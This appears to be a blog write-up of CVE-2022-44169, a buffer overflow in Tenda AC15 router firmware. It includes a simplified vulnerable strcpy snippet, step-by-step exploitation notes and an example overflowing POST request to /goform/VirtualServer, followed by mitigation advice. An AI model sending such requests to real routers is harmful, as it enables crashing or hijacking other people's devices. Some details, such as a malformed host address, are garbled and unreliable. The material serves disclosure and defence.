The Tenda AC15 is a popular wireless router model found in many homes and small offices. However, users should be aware of a serious vulnerability disclosed as CVE-2022-44169. This vulnerability affects Tenda AC15 firmware version V15.03.05.18 and stems from a buffer overflow in the function handling virtual server settings: formSetVirtualSer. This post will walk you through the technical details, exploitation process, and ways to secure your device.
What is a Buffer Overflow?
A buffer overflow happens when a program writes more data to a block of memory, or buffer, than it’s allowed to handle. In the case of routers, this often means an attacker can break out of the application flow, potentially hijacking the router.
Where is the Bug?
Tenda firmware has a formSetVirtualSer function. This handles requests when users configure the virtual server (port forwarding) feature through the router’s web interface. Here, user input is not properly checked for length, especially for the vritual_server parameter, letting attackers push in oversized data and overwrite important parts of memory on the router.
Original References
- CVE Source
- Exploit Database Reference
- Github POC Sample
- Firmware Download (for testing)
A snippet of reverse-engineered C code (simplified for clarity) from the Tenda AC15 firmware
void formSetVirtualSer(char *vritual_server) {
char buffer[256];
// User input copied without length verification
strcpy(buffer, vritual_server); // <-- No length check!
// ... routine handling
}
This function copies the user-supplied vritual_server parameter directly into a fixed-size buffer. If a user sends more than 256 bytes, it overflows buffer boundaries, potentially allowing code execution.
Step-by-Step Exploit
1. Attacker prerequisites: Remote attacker must be able to reach the router’s admin web interface (often port 80 or 808).
2. Crafting the HTTP request: The attacker sends a POST request to the router administration endpoint (like /goform/VirtualServer) with the vritual_server parameter set to a string longer than 256 bytes.
3. Payload: The data beyond 256 bytes can be crafted to overwrite important control structures, such as the return pointer. This may allow the injection of shellcode or a remote code execution (RCE) payload.
Example malicious request
POST /goform/VirtualServer HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
vritual_server=AAAAAAAAAAAAAAAA......<over 256 A's>......BBBB
In this example, 256+ bytes of A (x41) overflow the buffer, and the final BBBB may be tailored to overwrite the saved return address.
Router crash (denial-of-service)
- Remote Code Execution — If the attacker is able to overwrite with a carefully crafted payload, it may be possible to execute arbitrary code, potentially giving remote access to the attacker.
Mitigation
- Update Firmware: ALWAYS keep your router’s firmware updated. Check Tenda support for new releases.
- Disable Remote Management: Make sure that the web interface is not accessible from the internet (WAN).
Conclusion
CVE-2022-44169 in Tenda AC15 V15.03.05.18 is a classic, severe buffer overflow vulnerability in the virtual server settings handler (formSetVirtualSer). Anyone with network access to the router’s admin interface (local or remote) can crash or compromise the router.
If you’re using a Tenda AC15 — update your firmware now and check your settings!
Stay safe and secure your routers!
*This guide is for educational purposes and ethical research only. Do not exploit devices without permission.*
External Links & Credits
- CVE-2022-44169 - NVD
- Exploit Database Entry
- Tenda Official Firmware Download
- Github PoC
Feel free to ask technical questions or for further clarifications!
Timeline
Published on: 11/21/2022 15:15:00 UTC
Last modified on: 11/21/2022 20:30:00 UTC